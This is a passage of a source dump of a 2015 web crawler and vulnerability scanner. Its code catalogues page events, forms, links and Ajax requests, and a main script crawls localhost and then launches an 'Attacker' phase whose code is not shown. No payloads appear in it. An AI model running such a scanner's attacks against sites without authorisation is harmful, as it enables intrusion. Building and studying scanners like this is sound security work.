elems[my_counter_i].onmousedown}) 62 | } 63 | if (elems[my_counter_i].onmousemove != null) { 64 | events.push({"method": "onmousemove", "func": elems[my_counter_i].onmousemove}) 65 | } 66 | if (elems[my_counter_i].onmouseout != null) { 67 | events.push({"method": "onmouseout", "func": elems[my_counter_i].onmouseout}) 68 | } 69 | if (elems[my_counter_i].onmouseup != null) { 70 | events.push({"method": "onmouseup", "func": elems[my_counter_i].onmouseup}) 71 | } 72 | //console.log("We have: " + events.length + " events"); 73 | if (events.length > 0) { 74 | elem = elems[my_counter_i] 75 | dom_adress = getXPath(elem); 76 | html_class = elems[my_counter_i].className; 77 | for (my_counter_j = 0; my_counter_j < events.length; my_counter_j++) { 78 | function_id = MD5(events[my_counter_j].func.toString()) 79 | f = events[my_counter_j].func.toString() 80 | e = events[my_counter_j].event_type 81 | //clickable = JSON.parse(events[j]) 82 | tut1 = events[my_counter_j]; 83 | resp = { 84 | "function_id" : function_id, 85 | "event" : events[my_counter_j].method, 86 | "id" : id, 87 | "tag" : tag, 88 | "addr" : dom_adress, 89 | "class" : html_class 90 | } 91 | resp = JSON.stringify(resp); 92 | jswrapper.add_eventlistener_to_element(resp) 93 | } 94 | } 95 | 96 | } 97 | } 98 | 99 | catch_properties(); -------------------------------------------------------------------------------- /crawler/js/timing_wrapper.js: -------------------------------------------------------------------------------- 1 | /* 2 | *Copyright (C) 2015 Constantin Tschuertz 3 | * 4 | * This program is free software: you can redistribute it and/or modify 5 | * it under the terms of the GNU General Public License as published by 6 | * the Free Software Foundation, either version 3 of the License, or 7 | * any later version. 8 | * 9 | *This program is distributed in the hope that it will be useful, 10 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | * GNU General Public License for more details. 13 | * 14 | * You should have received a copy of the GNU General Public License 15 | * along with this program. If not, see . 16 | */ 17 | 18 | 19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery 20 | timingCallbackWrap(window, "setTimeout", 0, timeoutWrapper); 21 | timingCallbackWrap(window, "setInterval", 0, intervallWrapper); -------------------------------------------------------------------------------- /crawler/main.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | import logging 20 | 21 | from attacker import Attacker 22 | from crawler import Crawler 23 | from database.databasemanager import DatabaseManager 24 | from utils.config import CrawlConfig, AttackConfig 25 | from models.utils import CrawlSpeed 26 | from utils.user import User 27 | import csv 28 | from utils.utils import calculate_similarity_between_pages 29 | 30 | # Here you can specify the logging. Now it logs to the console. If you uncomment the two lines below, then it logs in the file. 31 | logging.basicConfig(level=logging.DEBUG, 32 | format='%(asctime)s: %(levelname)s - %(message)s', 33 | #filename='Attack.log', 34 | #filemode='w' 35 | ) 36 | 37 | if __name__ == '__main__': 38 | 39 | 40 | # In the Userobject, the first string you set is the name of the crawl run and also the name of the created database. 41 | # So if you want to keep old runs then just give different names for each crawl 42 | 43 | 44 | # The first of the line below, starts a scan with a logged in user. 45 | # Parameter desc: Name of DB - Privilege level: deprecated(Just let it 0) - URL where the login form is stored - login data as dict. The key is the parameter name in the login form that has to be set - 46 | # session: reflects the session within a DB. It is deprecated. Just set it to ABC 47 | #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC") 48 | 49 | 50 | # Crawl without user session. Parameter desc: Name of DB - Privilege level - session 51 | user = User("Test", 0, session="ABC") 52 | 53 | url = "http://localhost/" 54 | # Creates the crawler config: URL: start url of the crawler(independent from login) - max_dept: how deep to crawl(link), max_click_depth: how deep to follow events - Crawlspeed: Fast is the best value here 55 | crawler_config = CrawlConfig("Some Name, doesn't matter", url, max_depth=1, max_click_depth=2, crawl_speed=CrawlSpeed.Fast) 56 | 57 | # From here you have nothing to chance. Except you want no attacking, then comment out the lines down 58 | logging.info("Crawler started...") 59 | database_manager = DatabaseManager(user, dropping=True) 60 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082) 61 | crawler.crawl(user) 62 | logging.info("Crawler finished") 63 | 64 | # If you want no attacking comment out the lines below. 65 | logging.info("Start attacking...") 66 | attack_config = AttackConfig(url) 67 | attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082) 68 | attacker.attack(user) 69 | logging.info("Finish attacking...") -------------------------------------------------------------------------------- /crawler/models/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' -------------------------------------------------------------------------------- /crawler/models/ajaxrequest.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import hashlib 19 | from models.asyncrequests import AsyncRequests 20 | 21 | 22 | class AjaxRequest(AsyncRequests): 23 | ''' 24 | Models an Ajax-Request issued by an event 25 | ''' 26 | def __init__(self, method, url, trigger, parameters=None): 27 | super(AjaxRequest, self).__init__(method, url, parameters) 28 | self.trigger = trigger 29 | 30 | def toString(self): 31 | msg = "[Ajax - Methode: " + self.method + " - Url: "+ self.url.toString() + " - Trigger: " + self.trigger.toString() + " \n" 32 | for param_pair in self.parameters if self.parameters is not None else []: 33 | msg += " - Parameter pair: " + str(param_pair) 34 | return msg 35 | 36 | def __eq__(self, other): 37 | if not isinstance(other, self.__class__): 38 | return False 39 | try: 40 | url = self.url.complete_url 41 | except AttributeError: 42 | url = self.url 43 | try: 44 | o_url = other.url.complete_url 45 | except AttributeError: 46 | o_url = other.url 47 | 48 | return self.method == other.method and url == o_url and self.trigger == other.trigger 49 | 50 | def __neg__(self): 51 | return not self.__eq__() 52 | 53 | -------------------------------------------------------------------------------- /crawler/models/asyncrequests.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | import hashlib 20 | class AsyncRequests(): 21 | 22 | def __init__(self, method, url, parameters=None): 23 | self.method = method 24 | self.url = url 25 | self.request_structure = None 26 | self.structure = None 27 | 28 | self.parameters = parameters 29 | if not isinstance(self.parameters, dict) and self.parameters is not None: 30 | self.handle_parameters() 31 | 32 | @property 33 | def request_hash(self): 34 | try: 35 | return self.get_hash() 36 | except AttributeError: 37 | raise AttributeError("You need first to analyze url") 38 | 39 | 40 | def handle_parameters(self): 41 | try: 42 | key_value_pairs = self.parameters.split("&") 43 | tmp = {} 44 | for key_value_pair in key_value_pairs: 45 | try: 46 | key, value = key_value_pair.split("=") 47 | except ValueError: 48 | continue 49 | tmp[key] = value 50 | tmp = sorted(tmp.items()) 51 | self.parameters = {} 52 | for key, val in tmp: 53 | self.parameters[key] = val 54 | except AttributeError: 55 | self.parameters = None 56 | 57 | def get_hash(self): 58 | s_to_hash = self.url.abstract_url + "+" + self.method 59 | try: 60 | for k in [x[0] for x in self.parameters]: 61 | s_to_hash += "++" + k 62 | except TypeError: 63 | pass 64 | b_to_hash = s_to_hash.encode("utf-8") 65 | d = hashlib.md5() 66 | d.update(b_to_hash) 67 | return d.hexdigest() -------------------------------------------------------------------------------- /crawler/models/asyncrequeststructure.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class AsyncRequestStructure(): 19 | 20 | def __init__(self, structure_hash, parameters= None): 21 | self.structure_hash = structure_hash 22 | self.parameters = parameters -------------------------------------------------------------------------------- /crawler/models/clickable.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import hashlib 19 | from models.clickabletype import ClickableType 20 | 21 | 22 | class Clickable(): 23 | ''' 24 | Models interesting element with events as attributes 25 | ''' 26 | 27 | def __init__(self, event, tag, dom_address, id = None, html_class = None, clickable_depth = None, function_id = None): 28 | self.event = event 29 | self.tag = tag 30 | self.dom_address = dom_address 31 | self.id = id 32 | self.html_class = html_class 33 | self.links_to = None 34 | self.clicked = False 35 | self.clickable_type = None 36 | self.clickable_depth = clickable_depth 37 | self.function_id = function_id 38 | 39 | def toString(self): 40 | msg = "" 41 | msg += "[TAG: " + self.tag 42 | if self.id is not None and not self.id == "": 43 | msg += " - ID: " + self.id 44 | if self.event is not None and not self.event == "": 45 | msg += " - Event: " + self.event 46 | if self.html_class is not None and not self.html_class == "": 47 | msg += " - Class: " + self.html_class 48 | msg += " - Domaddress: " + self.dom_address 49 | if self.links_to is not None: 50 | msg += " - Links to: " + self.links_to 51 | if self.clickable_depth is not None: 52 | msg += " - Clickable Depth: " + str(self.clickable_depth) 53 | if self.function_id is not None: 54 | msg += " - FunctionID: " + self.function_id 55 | if self.clickable_type is not None: 56 | if self.clickable_type == ClickableType.CreatesNewNavigatables: 57 | msg += " - ClickableType: CreateNewNavigatable" 58 | elif self.clickable_type == ClickableType.Link: 59 | msg += " - ClickableType: Link" 60 | elif self.clickable_type == ClickableType.SendingAjax: 61 | msg += " - ClickableType: SendingAjax" 62 | elif self.clickable_type == ClickableType.UIChange: 63 | msg += " - ClickableType: UiChange" 64 | elif self.clickable_type == ClickableType.Error: 65 | msg += " - ClickableType: Error" 66 | elif self.clickable_type == ClickableType.IgnoredByCrawler: 67 | msg += " - ClickableType: IgnoredByCrawler" 68 | elif self.clickable_type == ClickableType.UnsupportedEvent: 69 | msg += " - ClickableType: UnsupportedEvent" 70 | else: 71 | msg += " - ClickableType: Unknown" 72 | msg += "]" 73 | return msg 74 | 75 | def __eq__(self, other): 76 | if not isinstance(other, self.__class__): 77 | return False 78 | if self.clickable_type is not None and other.clickable_type is not None: 79 | return self.dom_address == other.dom_address and self.event == other.event and self.clickable_type == other.clickable_type and self.links_to == other.links_to 80 | else: 81 | return self.dom_address == other.dom_address and self.event == other.event and self.links_to == other.links_to 82 | 83 | def __hash__(self): 84 | s_to_hash = self.toString() 85 | return hash(s_to_hash) 86 | 87 | 88 | def __ne__(self, other): 89 | return not self.__eq__(other) 90 | 91 | def similar(self, other): 92 | if not isinstance(other, self.__class__): 93 | return False 94 | if self == other: 95 | return True 96 | elif self.html_class == other and self.id == other.id and self.event == other.event and levenshtein < 4: 97 | return True 98 | else: 99 | return False -------------------------------------------------------------------------------- /crawler/models/clickabletype.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from enum import Enum 19 | 20 | class ClickableType(Enum): 21 | UIChange = 0 22 | Link = 1 23 | CreatesNewNavigatables = 2 24 | Error = 3 25 | SendingAjax = 4 26 | IgnoredByCrawler = 5 27 | UnsupportedEvent = 6 28 | CreateNewWindow = 7 -------------------------------------------------------------------------------- /crawler/models/deltapage.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | from models.webpage import WebPage 20 | 21 | class DeltaPage(WebPage): 22 | 23 | def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, generator = None, parent_id = None, delta_depth = None, base_url = None): 24 | WebPage.__init__(self, id, url, html, cookiesjar, depth, base_url=base_url) 25 | self.generator = generator 26 | self.generator_requests = [] 27 | self.parent_id = parent_id 28 | self.delta_depth = delta_depth 29 | 30 | def toString(self): 31 | msg = "[ Page: " + str(self.url) + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) +" \n" 32 | msg += "Parent-ID: " + str(self.parent_id) + " - Generator: " + self.generator.toString() + " - Delta Depth: " + str(self.delta_depth) + " \n" 33 | if len(self.generator_requests) > 0: 34 | msg += "Generator AsyncRequests: \n" 35 | for r in self.generator_requests: 36 | msg += " - " + r.toString() + " \n" 37 | if len(self.clickables) > 0: 38 | msg += "Clickable: \n" 39 | for elem in self.clickables: 40 | msg += elem.toString() + " \n" 41 | if len(self.timing_requests) > 0: 42 | msg += "Timingrequests: \n" 43 | for elem in self.timing_requests: 44 | msg += elem.toString() + " \n" 45 | if len(self.links) > 0: 46 | msg += "Static Links: \n" 47 | for link in self.links: 48 | tmp = link.toString() 49 | msg += tmp + " \n" 50 | if len(self.forms) > 0: 51 | msg += "Forms: \n" 52 | for elem in self.forms: 53 | msg += elem.toString() + " \n" 54 | return msg + "]" 55 | 56 | 57 | -------------------------------------------------------------------------------- /crawler/models/enumerations.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | from enum import Enum 18 | 19 | class XHRBehavior(Enum): 20 | IgnoreXHR = 0 21 | ObserveXHR = 1 22 | InterceptXHR = 2 23 | -------------------------------------------------------------------------------- /crawler/models/form.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | import hashlib 20 | 21 | 22 | class HtmlForm(): 23 | def __init__(self, parameters, action, method, dom_address=None): 24 | self.parameter = parameters # Array of FormInput's 25 | self.parameter = sorted(self.parameter, key=lambda parameter: parameter.name if parameter.name is not None else "") 26 | self.action = action 27 | self.method = method 28 | self.dom_address = dom_address 29 | 30 | @property 31 | def form_hash(self): 32 | return self.get_hash() 33 | 34 | def toString(self): 35 | msg = "[Form: Action: '" + self.action.abstract_url + "' Method:' " + self.method + " - Formhash: " + self.get_hash() + " \n" 36 | if self.dom_address is not None: 37 | msg += "Dom Address: " + self.dom_address + " \n" 38 | for elem in self.parameter: 39 | msg += "[Param: " + str(elem.tag) + " Name: " + str(elem.name) + " Inputtype: " + str( 40 | elem.input_type) + " Values: " + str(elem.values) + "] \n" 41 | return msg + "]" 42 | 43 | def hasSubmit(self): 44 | return self.submit != None 45 | 46 | def __eq__(self, other): 47 | if not isinstance(other, self.__class__): 48 | return False 49 | return self.get_hash() == other.get_hash() 50 | 51 | def __ne__(self, other): 52 | return not self.__eq__(other) 53 | 54 | def get_hash(self): 55 | s_to_hash = self.action.abstract_url + ";" + self.method + ";" 56 | for p in self.parameter: 57 | s_to_hash += str(p.name) + ";" + p.tag + ";" + str(p.input_type) + ";" 58 | b_to_hash = s_to_hash.encode("utf-8") 59 | d = hashlib.md5() 60 | d.update(b_to_hash) 61 | return d.hexdigest() 62 | 63 | 64 | class FormInput(): 65 | def __init__(self, tag, name, input_type="", values=None): 66 | self.tag = tag 67 | self.name = name 68 | self.values = values 69 | self.input_type = input_type 70 | 71 | def __eq__(self, other): 72 | if not isinstance(other, self.__class__): 73 | return False 74 | if self.values is not None: 75 | for val in self.values: 76 | if other.values is None or not val in other.values: 77 | return False 78 | return self.tag == other.tag and self.name == other.name and self.input_type == other.input_type 79 | 80 | def __ne__(self, other): 81 | return not self.__eq__(other) 82 | 83 | def toString(self): 84 | return "[Param: " + str(self.tag) + " Name: " + str(self.name) + " Inputtype: " + str( 85 | self.input_type) + " Values: " + str(self.values) + "] \n" 86 | 87 | 88 | class InputField(): 89 | def __init__(self, input_type, html_id=None, html_class=None, value=None): 90 | self.input_type = input_type 91 | self.html_id = html_id 92 | self.html_class = html_class 93 | self.value = value # Predifiend value, if available... 94 | -------------------------------------------------------------------------------- /crawler/models/keyclickable.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from models.clickable import Clickable 19 | from models.clickabletype import ClickableType 20 | 21 | class KeyClickable(Clickable): 22 | 23 | def __init__(self, clickable, key_event): 24 | Clickable.__init__(self, clickable.event, clickable.tag, clickable.dom_address, clickable.id, clickable.html_class, clickable.clickable_depth, clickable.function_id) 25 | self.random_char = key_event #Is the key typed in for triggering the clickabel 26 | 27 | def toString(self): 28 | msg = "" 29 | msg += "[TAG: " + self.tag 30 | if self.id is not None and not self.id == "": 31 | msg += " - ID: " + self.id 32 | if self.event is not None and not self.event == "": 33 | msg += " - Event: " + self.event 34 | if self.html_class is not None and not self.html_class == "": 35 | msg += " - Class: " + self.html_class 36 | msg += " - Domadress: " + self.dom_address 37 | if self.links_to is not None: 38 | msg += " - Links to: " + self.links_to 39 | if self.clickable_depth is not None: 40 | msg += " - Clickable Depth: " + str(self.clickable_depth) 41 | if self.function_id is not None: 42 | msg += " - FunctionID: " + self.function_id 43 | if self.clickable_type is not None: 44 | if self.clickable_type == ClickableType.CreatesNewNavigatables: 45 | msg += " - ClickableType: Create_new_navigatable" 46 | elif self.clickable_type == ClickableType.Link: 47 | msg += " - ClickableType: Link" 48 | elif self.clickable_type == ClickableType.SendingAjax: 49 | msg += " - ClickableType: SendingAjax" 50 | elif self.clickable_type == ClickableType.UIChange: 51 | msg += " - ClickableType: UiChange" 52 | elif self.clickable_type == ClickableType.Error: 53 | msg += " - ClickableType: Error" 54 | if self.random_char is not None: 55 | msg += self.random_char 56 | msg += "]" 57 | return msg -------------------------------------------------------------------------------- /crawler/models/link.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | class Link(): 19 | 20 | def __init__(self, url, dom_address, html_id = "", html_class = ""): 21 | self.url = url 22 | self.dom_address = dom_address 23 | self.html_id = html_id 24 | self.html_class = html_class 25 | 26 | def toString(self): 27 | res = "[" 28 | res += "A-HREF: " + self.url.abstract_url + " - {}".format(self.url.url_hash) 29 | res += " - Domadress: " + self.dom_address 30 | if self.html_id != "": 31 | res += " - ID: " + self.html_id 32 | if self.html_class != "": 33 | res += " - Class: " + self.html_class 34 | res += "]" 35 | return res 36 | 37 | def __eq__(self, other): 38 | if not isinstance(other, self.__class__): 39 | return False 40 | return self.url == other.url 41 | 42 | def __ne__(self, other): 43 | return not self.__eq__(other) 44 | -------------------------------------------------------------------------------- /crawler/models/parametertype.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from enum import Enum 19 | 20 | __author__ = 'constantin' 21 | 22 | class ParameterType(Enum): 23 | """ 24 | This describes the type of the parameters: 25 | - Digit: Single digit, exp: 0,1,2, ... 26 | - Float: Float value, exp: 1.5, 99,32, 3,1415... 27 | - Char; Single digit, float or character, exp: a, B, X, 5, ... 28 | - Integer: Normal Integer > 9, exp, 23, 39, 42, ... 29 | - String: String contains only Characters, exp: Turing, Captain Jack 30 | - Alpha-Numerical: Contains the rest, exp: diofjiodjr23jreß9324jr3j0ew9rj 0r9 j3029j 31 | 32 | """ 33 | Digit = 0 34 | Float = 1 35 | Char = 2 36 | Integer = 3 37 | String = 4 38 | AlphaNumerical = 5 39 | NoParameter = 6 40 | -------------------------------------------------------------------------------- /crawler/models/timingrequest.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | from models.asyncrequests import AsyncRequests 20 | 21 | 22 | class TimingRequest(AsyncRequests): 23 | ''' 24 | Models an Ajax-Request issued after timeout or intervall 25 | ''' 26 | def __init__(self, method, url, time, event, parameters=None): 27 | super(TimingRequest, self).__init__(method, url, parameters) 28 | self.event = event #Timout or Intervall 29 | self.time = time 30 | 31 | def toString(self): 32 | return "[Timing - Method: " + str(self.method) + " - Url: "+ str(self.url.toString()) + " - Trigger: " + str(self.event) + "]" 33 | -------------------------------------------------------------------------------- /crawler/models/url.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | import hashlib 19 | from urllib.parse import urlparse 20 | 21 | 22 | class Url(): 23 | def __init__(self, url, depth_of_finding = None): 24 | self.complete_url = url 25 | parsed_url = urlparse(url) 26 | self.scheme = parsed_url.scheme 27 | self.domain = parsed_url.netloc 28 | if parsed_url.path != "/": 29 | self.path = parsed_url.path 30 | else: 31 | self.path = "" 32 | self.query = parsed_url.query 33 | self.fragment = parsed_url.fragment 34 | 35 | self.parameters = {} 36 | self.depth_of_finding = depth_of_finding 37 | self.url_structure = None 38 | self.abstract_url = None 39 | 40 | if len(parsed_url.query) > 0: 41 | query_splitted = self.query.split("&") 42 | for splits in query_splitted: 43 | tmp = splits.split("=") 44 | if len(tmp) == 2: 45 | param_name = tmp[0] 46 | param_value = tmp[1] 47 | else: 48 | param_name = tmp[0] 49 | param_value = None 50 | if param_name in self.parameters: 51 | self.parameters[param_name].append(param_value) 52 | else: 53 | self.parameters[param_name] = [param_value] 54 | keys = self.parameters.keys() 55 | keys = sorted(keys) 56 | tmp_params = {} 57 | for key in keys: 58 | tmp_params[key] = self.parameters[key] 59 | self.parameters = tmp_params 60 | 61 | self.url_hash = self.get_hash() 62 | 63 | def get_values_to_parameter(self, parameter_name): 64 | if parameter_name not in self.parameters: 65 | raise KeyError("{} is not in parameters".format(parameter_name)) 66 | return self.parameters[parameter_name] 67 | 68 | def get_url_description(self): 69 | return self.url_structure 70 | 71 | def get_path(self): 72 | result = self.scheme + "://" + self.domain 73 | if self.path is not None and len(self.path) > 0: 74 | if self.path[0] == "/": 75 | result = self.scheme + "://" + self.domain + self.path 76 | else: 77 | result = self.scheme + "://" + self.domain + "/" + self.path 78 | return result 79 | else: 80 | return "" 81 | 82 | def get_hash(self): 83 | s_to_hash = self.path 84 | for k in self.parameters: 85 | s_to_hash += "++" + k 86 | b_to_hash = s_to_hash.encode("utf-8") 87 | d = hashlib.md5() 88 | d.update(b_to_hash) 89 | return d.hexdigest() 90 | 91 | def toString(self): 92 | return self.complete_url 93 | 94 | def has_equal_description(self, other): 95 | if not isinstance(other, self.___class__): 96 | return False 97 | return self.url_hash == other.url_hash 98 | 99 | def equal_abstract_url(self, other): 100 | if not isinstance(other, self.__class__): 101 | return False 102 | return self.abstract_url == other.abstract_url 103 | 104 | def __eq__(self, other): 105 | if not isinstance(other, self.__class__): 106 | return False 107 | return self.toString() == other.toString() 108 | 109 | def __ne__(self, other): 110 | return not self.__eq__(other) -------------------------------------------------------------------------------- /crawler/models/urlstructure.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | from enum import Enum 19 | import hashlib 20 | from models.parametertype import ParameterType 21 | 22 | __author__ = 'constantin' 23 | 24 | 25 | class UrlStructure(): 26 | 27 | def __init__(self, path, paramters = {}, url_hash = None): 28 | self.path = path 29 | self.parameters = paramters # List of dict: parametername, parametertype, origin, generating <= change of the param creates a new page 30 | self.url_hash = url_hash 31 | 32 | def get_parameter_type(self, parameter_name): 33 | if parameter_name not in self.parameters: 34 | raise KeyError("{} not found".format(parameter_name)) 35 | return ParameterType(self.parameters[parameter_name]['parameter_type']) 36 | 37 | def get_parameter_origin(self, parameter_name): 38 | if parameter_name not in 